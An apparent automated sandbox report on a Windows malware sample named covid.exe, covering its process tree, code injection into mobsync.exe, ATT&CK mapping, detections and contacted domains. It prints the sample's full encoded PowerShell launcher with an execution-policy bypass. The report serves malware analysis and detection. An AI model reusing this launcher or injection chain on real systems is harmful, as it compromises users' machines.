    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686065C70 cpuid 13_2_00007FF686065C70
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FF686061F44
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,13_2_00007FF686061DDC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,13_2_00007FF686061EAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: try_get_function,GetLocaleInfoW,13_2_00007FF68605EF2C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,13_2_00007FF686062398
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FF6860624C4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,13_2_00007FF686062190
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,13_2_00007FF68605E9AC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,13_2_00007FF686061A90
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00007FF6860622E8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF6FE121F44
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,18_2_00007FF6FE121DDC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,18_2_00007FF6FE121EAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: try_get_function,GetLocaleInfoW,18_2_00007FF6FE11EF2C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,18_2_00007FF6FE122398
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF6FE1224C4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,18_2_00007FF6FE11E9AC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,18_2_00007FF6FE122190
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,18_2_00007FF6FE121A90
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00007FF6FE1222E8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,29_2_00007FF7E3D824C4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,29_2_00007FF7E3D82398
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_00007FF7E3D822E8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,29_2_00007FF7E3D81A90
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,29_2_00007FF7E3D7E9AC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,29_2_00007FF7E3D82190
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,29_2_00007FF7E3D81F44
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: try_get_function,GetLocaleInfoW,29_2_00007FF7E3D7EF2C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,29_2_00007FF7E3D81EAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: EnumSystemLocalesW,29_2_00007FF7E3D81DDC
    Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Users\user\Desktop\covid.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\Desktop\covid.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686048288 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_00007FF686048288

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Registry Run Keys / Startup Folder1Process Injection411Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsPowerShell4Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Modify Registry1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerSecurity Software Discovery31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection411LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery32Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 379751 Sample: covid.exe Startdate: 01/04/2021 Architecture: WINDOWS Score: 100 82 Antivirus / Scanner detection for submitted sample 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 Potential dropper URLs found in powershell memory 2->86 88 2 other signatures 2->88 9 covid.exe 2 2->9         started        13 buyonegetone.exe 2->13         started        15 buyonegetone.exe 2->15         started        17 buyonegetone.exe 2->17         started        process3 file4 64 C:\Users\user\AppData\Local\...\covid.exe.log, ASCII 9->64 dropped 102 Malicious encrypted Powershell command line found 9->102 104 Encrypted powershell cmdline option found 9->104 106 Bypasses PowerShell execution policy 9->106 19 powershell.exe 1 36 9->19         started        108 Early bird code injection technique detected 13->108 110 Writes to foreign memory regions 13->110 112 Allocates memory in foreign processes 13->112 23 mobsync.exe 13->23         started        25 conhost.exe 13->25         started        27 mobsync.exe 15->27         started        29 conhost.exe 15->29         started        31 mobsync.exe 17->31         started        34 conhost.exe 17->34         started        signatures5 process6 dnsIp7 60 C:\Users\user\AppData\...\buyonegetone.exe, PE32+ 19->60 dropped 62 PowerShell_transcr....20210401080426.txt, UTF-8 19->62 dropped 90 Uses cmd line tools excessively to alter registry or file data 19->90 92 Powershell drops PE file 19->92 36 buyonegetone.exe 19->36         started        39 iexplore.exe 6 85 19->39         started        42 conhost.exe 19->42         started        48 2 other processes 19->48 44 WerFault.exe 23->44         started        46 WerFault.exe 27->46         started        80 168.62.194.64 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->80 file8 signatures9 process10 dnsIp11 94 Early bird code injection technique detected 36->94 96 Writes to foreign memory regions 36->96 98 Allocates memory in foreign processes 36->98 100 Queues an APC in another process (thread injection) 36->100 50 mobsync.exe 36->50         started        52 conhost.exe 36->52         started        72 www.who.int 39->72 54 iexplore.exe 39->54         started        74 168.61.161.212 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 44->74 76 192.168.2.1 unknown unknown 46->76 signatures12 process13 dnsIp14 57 WerFault.exe 50->57         started        66 fontawesome-cdn.fonticons.netdna-cdn.com 23.111.9.35, 443, 49708, 49709 HIGHWINDS2US United States 54->66 68 108.177.15.154 GOOGLEUS United States 54->68 70 23 other IPs or domains 54->70 process15 dnsIp16 78 13.88.21.125 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 57->78

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    covid.exe16%VirustotalBrowse
    covid.exe34%ReversingLabsWin32.Ransomware.Generic
    covid.exe100%AviraTR/Dropper.Gen2

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    0.0.covid.exe.c70000.0.unpack100%AviraTR/Dropper.Gen2Download File

    Domains

    SourceDetectionScannerLabelLink
    platform.twitter.map.fastly.net0%VirustotalBrowse
    v1.addthisedge.com0%VirustotalBrowse
    www.clarity.ms0%VirustotalBrowse
    z.moatads.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://redux.js.org/api/store#subscribelistener0%Avira URL Cloudsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://fontello.comFont0%URL Reputationsafe
    http://fontello.comFont0%URL Reputationsafe
    http://fontello.comFont0%URL Reputationsafe
    https://www.google.%/ads/ga-audiences0%URL Reputationsafe
    https://www.google.%/ads/ga-audiences0%URL Reputationsafe
    https://www.google.%/ads/ga-audiences0%URL Reputationsafe
    http://www.wikipedia.com/0%URL Reputationsafe
    http://www.wikipedia.com/0%URL Reputationsafe
    http://www.wikipedia.com/0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    googleads.g.doubleclick.net
    		172.217.168.2
    		truefalse
      		high
      fontawesome-cdn.fonticons.netdna-cdn.com
      		23.111.9.35
      		truefalse
        		high
        platform.twitter.map.fastly.net
        		199.232.136.157
        		truefalseunknown
        www.who.int
        		unknown
        		unknownfalse
          		high
          m.addthis.com
          		unknown
          		unknownfalse
            		high
            v1.addthisedge.com
            		unknown
            		unknownfalseunknown
            www.clarity.ms
            		unknown
            		unknownfalseunknown
            s7.addthis.com
            		unknown
            		unknownfalse
              		high
              z.moatads.com
              		unknown
              		unknownfalseunknown
              static.doubleclick.net
              		unknown
              		unknownfalse
                		high
                use.fontawesome.com
                		unknown
                		unknownfalse
                  		high
                  cdn.who.int
                  		unknown
                  		unknownfalse
                    		high
                    platform.twitter.com
                    		unknown
                    		unknownfalse
                      		high
                      www.youtube.com
                      		unknown
                      		unknownfalse
                        		high
                        c.clarity.ms
                        		unknown
                        		unknownfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.who.int/publications/en/FL794448.htm.7.drfalse
                            		high
                            http://code.jquery.com/mobsync.exe, mobsync.exe, 00000014.00000002.340204624.0000023F81490000.00000040.00000001.sdmpfalse
                              		high
                              https://www.who.int/campaigns/FL794448.htm.7.drfalse
                                		high
                                https://www.paho.org/hq/index.php?lang=enFL794448.htm.7.drfalse
                                  		high
                                  https://www.afro.who.int/FL794448.htm.7.drfalse
                                    		high
                                    https://www.who.int/homeFL794448.htm.7.drfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.who.int/Tpowershell.exe, 00000001.00000002.293621546.000001A42B1B0000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.amazon.com/msapplication.xml.6.drfalse
                                          		high
                                          https://www.who.int/images/default-source/infographics/logo-who.tmb-1200v.jpg?Culture=en&amp;sfvrsn=FL794448.htm.7.drfalse
                                            		high
                                            http://youtube.com/streaming/otf/durations/112015base[1].js.7.drfalse
                                              		high
                                              https://www.who.int/emergencies/diseases/novel-coronavirus-2019FL794448.htm.7.drfalse
                                                		high
                                                http://youtube.com/streaming/metadata/segment/102015base[1].js.7.drfalse
                                                  		high
                                                  https://www.who.int/FL794448.htm.7.drfalse
                                                    		high
                                                    https://youtu.be/base[1].js.7.drfalse
                                                      		high
                                                      https://www.who.int/redirect-pages/mega-menu/emergencies/emergencies/democratic-republic-of-the-congFL794448.htm.7.drfalse
                                                        		high
                                                        http://schema.orgFL794448.htm.7.drfalse
                                                          		high
                                                          https://www.who.int/southeastasiaFL794448.htm.7.drfalse
                                                            		high
                                                            https://admin.youtube.combase[1].js.7.drfalse
                                                              		high
                                                              https://www.who.int/es/homeFL794448.htm.7.drfalse
                                                                		high
                                                                https://platform.twitter.com/widgets.jsFL794448.htm.7.drfalse
                                                                  		high
                                                                  https://www.who.int/home/search?indexCatalogue=genericsearchindex1&wordsMode=AnyWord&searchQuery=FL794448.htm.7.drfalse
                                                                    		high
                                                                    https://www.who.int/westernpacific/FL794448.htm.7.drfalse
                                                                      		high
                                                                      https://contoso.com/powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.who.int/emergencies/crises/cod/en/FL794448.htm.7.drfalse
                                                                          		high
                                                                          https://www.youtube.com/embed/yEIPefMsf70FL794448.htm.7.drfalse
                                                                            		high
                                                                            https://www.who.int/pt/homeFL794448.htm.7.drfalse
                                                                              		high
                                                                              https://stats.g.doubleclick.net/j/collectanalytics[1].js.7.drfalse
                                                                                		high
                                                                                https://www.who.int/about/governance/world-health-assembly/seventy-third-world-health-assemblyFL794448.htm.7.drfalse
                                                                                  		high
                                                                                  https://www.who.int/redirect-pages/page/novel-coronavirus-(covid-19)-situation-dashboardFL794448.htm.7.drfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.265257231.000001A412EE1000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://www.who.intpowershell.exe, 00000001.00000003.262923135.000001A42AFB3000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp, FL794448.htm.7.drfalse
                                                                                        		high
                                                                                        https://www.who.int/ar/homeFL794448.htm.7.drfalse
                                                                                          		high
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svgFL794448.htm.7.drfalse
                                                                                              		high
                                                                                              https://redux.js.org/api/store#subscribelistenerbase[1].js.7.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://www.who.int/zh/homeFL794448.htm.7.drfalse
                                                                                                		high
                                                                                                https://www.youtube.com/generate_204?cpn=base[1].js.7.drfalse
                                                                                                  		high
                                                                                                  https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5803f964fe6c9599FL794448.htm.7.drfalse
                                                                                                    		high
                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://youtube.com/api/drm/fps?ek=uninitializedbase[1].js.7.drfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.who.int/redirect-pages/mega-menu/data/announcement/world-health-statistics-2020FL794448.htm.7.drfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://fontello.comfa-regular-400[1].eot.7.drfalse
                                                                                                              		high
                                                                                                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.euro.who.int/en/homeFL794448.htm.7.drfalse
                                                                                                                		high
                                                                                                                http://fontello.comFontfa-regular-400[1].eot.7.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.who.int/ru/homeFL794448.htm.7.drfalse
                                                                                                                  		high
                                                                                                                  https://schema.orgFL794448.htm.7.drfalse
                                                                                                                    		high
                                                                                                                    https://www.who.int/emergencies/diseases/novel-coronavirus-2019/interactive-timelineFL794448.htm.7.drfalse
                                                                                                                      		high
                                                                                                                      https://www.who.int/news-room/eventsFL794448.htm.7.drfalse
                                                                                                                        		high
                                                                                                                        https://www.who.int/news/item#:ItemDefaultUrlFL794448.htm.7.drfalse
                                                                                                                          		high
                                                                                                                          http://youtube.com/yt/2012/10/10base[1].js.7.drfalse
                                                                                                                            		high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.who.int/fpowershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.who.int/ictrp/search/en/FL794448.htm.7.drfalse
                                                                                                                                  		high
                                                                                                                                  https://app.powerbi.com/FL794448.htm.7.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.who.int/about/what-we-do/who-brochureFL794448.htm.7.drfalse
                                                                                                                                      		high
                                                                                                                                      https://www.who.int/redirect-pages/mega-menu/emergencies/public-health-emergency--dashboardFL794448.htm.7.drfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.%/ads/ga-audiencesanalytics[1].js.7.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		low
                                                                                                                                        https://www.who.int/about/who-we-are/privacy-policyFL794448.htm.7.drfalse
                                                                                                                                          		high
                                                                                                                                          https://www.who.int/nt/powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.youtube.com/videoplaybackbase[1].js.7.drfalse
                                                                                                                                              		high
                                                                                                                                              https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpgFL794448.htm.7.drfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
